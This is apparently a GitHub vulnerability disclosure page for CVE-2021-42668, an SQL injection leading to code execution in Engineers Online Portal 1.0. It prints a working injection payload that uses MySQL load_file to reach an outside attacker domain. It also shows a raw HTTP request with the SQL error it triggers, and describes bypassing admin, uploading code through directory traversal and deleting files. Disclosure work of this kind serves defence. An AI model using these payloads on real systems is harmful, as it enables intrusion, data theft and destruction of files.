Skip to content

Latest commit

 

History

History

CVE-2021-42668

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 
 
 

Description

The id from my_classmates.php in Engineers Online Portal 1.0 parameter appears to be vulnerable to SQL injection and RCE attacks. The payload '+(select load_file('\\n0o5m5xdxay49mw826umfj1wsnygm9ix90xrkh86.nu11secur1tyPenetrationTestingEngineer.net\sch'))+' was submitted in the id parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can bypass the admin account and he can upload a malicious code by using the avatar vulnerability function with directory traversal method, then he can execute this malicious code. For this example, the attacker destroys all files in the current directory. STATUS Hiper Critical and Awful. CONCLUSION: This pseudo developer must be stopped immediately.

MySQL Request:

GET /nia_munoz_monitoring_system/my_classmates.php?id=189' HTTP/1.1
Host: 192.168.1.2
Cookie: PHPSESSID=k6gnppcljj6b7vs8ua3tdefmkt
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.2/nia_munoz_monitoring_system/dashboard_student.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close
Cache-Control: max-age=0

MySQL Response:

HTTP/1.1 200 OK
Date: Fri, 03 Dec 2021 17:54:59 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 5946
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html class="no-js">
<head>
<title>NIA Project Monitoring System</title>
       <meta name="description" content="Learning Management System">
       <meta name="keywords" conte
...[SNIP]...
<ul     id="da-thumbs" class="da-thumbs">
                                        You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''189'' order by lastname' at line 4

Reproduce:

href

M0r3:

Proof and Explot:

href